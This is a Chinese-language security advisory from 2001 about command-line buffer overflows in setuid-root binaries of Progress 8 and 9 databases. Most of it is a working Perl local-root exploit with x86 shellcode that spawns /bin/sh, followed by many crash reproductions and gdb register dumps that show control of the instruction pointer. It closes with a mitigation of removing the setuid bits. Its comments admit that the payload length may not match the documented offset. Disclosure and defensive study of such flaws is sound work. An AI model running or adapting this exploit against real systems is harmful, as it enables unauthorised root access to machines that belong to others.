
Progress 8.x和9.x存在多个本地缓冲溢出漏洞


发布时间:2001-10-09
更新时间:2001-10-09
严重程度:
威胁程度:本地管理员权限
错误类型:输入验证错误
利用方式:服务器模式

受影响系统
Progress 8 和 9
详细描述
Progress 中的多个 setuid root 程序(见下文 /usr/dlc/bin 目录清单)在处理命令行参数时没有正确检查边界,
导致多个缓冲区溢出漏洞;本地用户利用这些漏洞可以获得 root 权限。

测试代码
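#!/usr/bin/perl
# Progress 8 and 9 test exploit code
# Proof of concept by krfinisterre@checkfree.com
#
# Builds one long command-line argument for a setuid-root Progress binary
# under /usr/dlc/bin: a NOP sled, the shellcode, then the guessed return
# address repeated until the payload is $len bytes long.  The payload is
# written to stdout behind a dummy first argument ("a "), so it can be handed
# to the target through command substitution, e.g.
#     /usr/dlc/bin/_mprosrva `perl progress.pl 0`
# argv entries are C strings, so the script refuses to emit a payload that
# contains a NUL byte.  Nothing is passed through a shell any more: the
# original `system("echo -e ...")` interpolated raw payload bytes into a
# shell command line, so an offset that produced a quote, backslash, `$` or
# backtick byte would have been mangled or executed by the shell.
#
# Usage: progress.pl <offset>   (decimal integer added to $ret)

use strict;
use warnings;

my $len = 481;        # Total payload size.  NOTE(review): the _mprosrva crash
                      # transcript in this advisory needed 5746 bytes to reach
                      # EIP; 481 may apply to a different binary or build --
                      # confirm against the target before relying on it.
my $nop = "\x90";     # x86 NOP, used for the sled in front of the shellcode.
my $ret = 0xbfffe208; # Guessed stack address the overwritten return value
                      # should point at (somewhere inside the NOP sled).

# Linux/x86 int 0x80 shellcode, 45 bytes, no NUL bytes: builds "/bin/sh\0"
# on the stack above esp and calls execve (eax = 0x0b) on it.
my $shellcode =
    "\x89\xe6".
    "\x83\xc6\x30".
    "\xb8\x2e\x62\x69\x6e".
    "\x40".
    "\x89\x06".
    "\xb8\x2e\x73\x68\x21".
    "\x40".
    "\x89\x46\x04".
    "\x29\xc0".
    "\x88\x46\x07".
    "\x89\x76\x08".
    "\x89\x46\x0c".
    "\xb0\x0b".
    "\x87\xf3".
    "\x8d\x4b\x08".
    "\x8d\x53\x0c".
    "\xcd\x80";

if (@ARGV < 1) {
    print("Usage: $0 <offset>\n");
    exit(1);
}

my ($offset) = @ARGV;
# A non-numeric offset would silently become 0 and produce a misleading
# payload; insist on an integer.
unless ($offset =~ /^[+-]?\d+$/) {
    print STDERR "$0: offset must be an integer, got '$offset'\n";
    exit(1);
}

my $buffer = build_payload($len, $nop, $shellcode, $ret + $offset);

# The original computed this address and never used it; report it on stderr
# so the caller knows which guess was emitted (stdout stays payload-only).
printf STDERR "using return address 0x%lx\n", $ret + $offset;

binmode(STDOUT);
# "a " is a dummy first argument: several of the crashes in this advisory were
# triggered with a short first argument followed by the long one.
print "a $buffer\n";
exit(0);

#######################################
# Assemble the overflow payload.
# Arguments: $size      - total length in bytes
#            $nop       - one-byte NOP filler
#            $shellcode - code the return address should land in
#            $target    - 32-bit address repeated after the shellcode
# Returns:   the payload string
# Dies if the payload would contain a NUL byte (argv is a C string, so a NUL
# would truncate it).  Layout is the original's: the sled is
# $size - length($shellcode) - 100 bytes (never negative), then the shellcode,
# then the address appended 4 bytes at a time while the total is below $size.
#######################################
sub build_payload {
    my ($size, $nop, $shellcode, $target) = @_;

    # 'V' is an explicit unsigned 32-bit little-endian pack; on the x86 target
    # it yields the same bytes as the native 'l' the original used, without
    # depending on the host's endianness or signedness.
    my $addr = pack('V', $target & 0xffffffff);

    my $sled_len = $size - length($shellcode) - 100;
    $sled_len = 0 if $sled_len < 0;

    my $payload = $nop x $sled_len;
    $payload .= $shellcode;
    for (my $pos = $sled_len + length($shellcode); $pos < $size; $pos += 4) {
        $payload .= $addr;
    }

    die "payload contains a NUL byte; pick a different offset\n"
        if $payload =~ /\0/;

    return $payload;
}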

----------------------------------------------

# gdb /usr/dlc/bin/_mpros core
Core was generated by `/usr/dlc/bin/_mprosrva
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libm.so.6...done.
Loaded symbols for /lib/libm.so.6
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0x42424242 in ?? ()
(gdb) q
[root@localhost /root]# /usr/dlc/bin/_mprosrva `perl -e 'print "A" x 5746'`BBBB
BBBB == 0x42424242: those four trailing bytes are what ends up in EIP (see `#0  0x42424242 in ?? ()` above).

For _mprosrva, an argument of 1143 bytes is enough to start overwriting EAX; 5746 bytes puts the argument's bytes into EIP (the `info registers` output below shows the result).

(gdb) info registers
eax            0x80b3c80        134954112
ecx            0xbffff4f4       -1073744652
edx            0x480b5e31       1208704561
ebx            0x1      1
esp            0xbfffdbc0       0xbfffdbc0
ebp            0xbfffdbe0       0xbfffdbe0
esi            0x2      2
edi            0xbfffdcf4       -1073750796
eip            0x42424242       0x42424242
eflags         0x10206  66054
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x2b     43
gs             0x2b     43
fctrl          0x0      0
fstat          0x0      0
ftag           0x0      0
fiseg          0x0      0
fioff          0x0      0
foseg          0x0      0
fooff          0x0      0
fop            0x0      0


Below are several more examples. This first set was collected on SCO OpenServer (uname: SCO_SV 3.2 5.0.5) running PROGRESS 9.1B; each binary dumps core when given a long argument.

# uname -a
SCO_SV scosysv 3.2 5.0.5 i386
# ls -al /usr/dlc/bin/proserve
-rwxr-xr-x   1 root     sys         2708 Jan  9 15:29 /usr/dlc/bin/proserve
# /usr/dlc/bin/proserve `perl -e 'print "A" x 3000'`
PROGRESS Version 9.1B as of Sun Dec 3 20:27:14 EST 2000
Memory fault - core dumped
#

------------------

/usr/dlc/bin/_mprshut  `perl -e 'print "A" x 2000'`
Memory fault - core dumped

-----------------------------------

/usr/dlc/bin/_mprosrv `perl -e 'print "A" x 2000'`
Memory fault - core dumped

-------------------

/usr/dlc/bin/_probuild a `perl -e 'print "A" x 2000'`
Memory fault - core dumped

--------------------

/usr/dlc/bin/prodb    a `perl -e 'print "A" x 2000'`
Memory fault - core dumped


Everything below this line was collected against version 8.3B on Linux (gdb reports an i586-mandrake-linux build). Note that every binary listed is setuid root (`-rwsrwxr-x root root`), which is what turns these argument overflows into a local root issue.

-rwsrwxr-x    1 root     root       508151 Nov 10  1999
/usr/dlc/bin/_dbutil*
-rwsrwxr-x    1 root     root       557075 Nov 10  1999
/usr/dlc/bin/_mprosrv*
-rwsrwxr-x    1 root     root       561294 Nov 10  1999
/usr/dlc/bin/_mprosrva*
-rwsrwxr-x    1 root     root       604635 Nov 10  1999
/usr/dlc/bin/_mprshut*
-rwsrwxr-x    1 root     root      2574331 Nov 10  1999
/usr/dlc/bin/_probuild*
-rwsrwxr-x    1 root     root      2986163 Nov 10  1999
/usr/dlc/bin/_progres*
-rwsrwxr-x    1 root     root      2924760 Nov 10  1999
/usr/dlc/bin/_progresa*
-rwsrwxr-x    1 root     root       971209 Nov 10  1999
/usr/dlc/bin/_proutil*
-rwsrwxr-x    1 root     root       686582 Nov 10  1999
/usr/dlc/bin/_rfutil*
-rwsrwxr-x    1 root     root       122260 Nov 10  1999 /usr/dlc/bin/prodb*
-rwsrwxr-x    1 root     root       134337 Nov 10  1999
/usr/dlc/bin/prolib*

[root@localhost /root]# /usr/dlc/bin/prolib library-name `perl -e 'print
"A" x 2000'`
Invalid prolib command
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/prolib core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/prolib library-name
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libm.so.6...done.
Loaded symbols for /lib/libm.so.6
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
#0  0x41414141 in ?? ()

---------------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/_probuild sports `perl -e 'print "A" x
1200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb  /usr/dlc/bin/_probuild core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_probuild sports
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x400905c7 in ?? ()
(gdb) info register eax
eax            0x41414141       1094795585
(gdb)


---------------------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/_progres sports `perl -e 'print "A" x
1200'`
Segmentation fault (core dumped)

[root@localhost /root]# gdb /usr/dlc/bin/_progres core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_progres sports
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x400905c7 in ?? ()
(gdb) info register eax
eax            0x41414141       1094795585
(gdb)

------------------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/_progresa sports `perl -e 'print "A" x
4200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_progresa core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_progresa sports
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x40090590 in ?? ()
(gdb) info register eax
eax            0x41414141       1094795585

--------------------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/_dbutil prorest sports `perl -e 'print
"A"
x 4200'`
** Cannot find or open file
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)#w:)
#w:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

SYSTEM ERROR: Memory violation. (49)
** Save file named core for analysis by Progress Software Corporation.
(439)
Quit (core dumped)


[root@localhost /root]# gdb /usr/dlc/bin/_dbutil core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_dbutil prorest sports
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 3, Quit.
Reading symbols from /lib/libm.so.6...done.
Loaded symbols for /lib/libm.so.6
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
Reading symbols from /lib/libnss_files.so.2...done.
Loaded symbols for /lib/libnss_files.so.2
#0  0x400590d1 in kill () from /lib/libc.so.6
(gdb) info register edi
edi            0x41414141       1094795585


-----------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/_proutil sports `perl -e 'print "A" x
4200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_proutil core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_proutil sports
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x40090590 in ?? ()

(gdb) info register eax
eax            0x41414141       1094795585

-------------------------------------------------------------
[root@localhost /root]# /usr/dlc/bin/_rfutil sports `perl -e 'print "A" x
4200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_rfutil core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_rfutil sports
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x400905ad in ?? ()

(gdb) info register eax
eax            0x41414141       1094795585

--------------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/prodb  sports `perl -e 'print "A" x
4200'`

The database name is too long.
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/prodb core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAA/.db.bi.tl.lg.lk
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0x41414141 in ?? ()

(gdb) info register eip
eip            0x41414141       0x41414141


-----------------------------------------------------------------
[root@localhost /root]# /usr/dlc/bin/_mprosrv  sports `perl -e 'print "A" x
4200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_mprosrv core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_mprosrv sports
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x40090590 in ?? ()
(gdb) info register eax
eax            0x41414141       1094795585
------------------------------------------------------------------

[root@localhost /root]# /usr/dlc/bin/_mprosrva  sports `perl -e 'print "A"
x 4200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_mprosrva core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_mprosrva sports
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x40090590 in ?? ()
(gdb) info register eax
eax            0x41414141       1094795585

---------------------------------------------------------------
[root@localhost /root]# /usr/dlc/bin/_mprshut sports `perl -e 'print "A" x
4200'`
Segmentation fault (core dumped)
[root@localhost /root]# gdb /usr/dlc/bin/_mprshut core
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i586-mandrake-linux"...
Core was generated by `/usr/dlc/bin/_mprshut sports
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.
#0  0x40090590 in ?? ()
(gdb) info register eax
eax            0x41414141       1094795585
(gdb)

-----------------------------------------------------------------------

解决方案
尚无厂商补丁。临时缓解措施:去掉上文列出的 /usr/dlc/bin 下各程序的 setuid 位(chmod u-s),或将它们的执行权限限制给可信的组;注意这可能影响需要以 root 身份运行的数据库服务功能,请在测试环境中确认。

相关信息
发现者:KF (dotslash@snosoft.com)
参考资料:http://packetstormsecurity.org/0101-exploits/progress-db.txt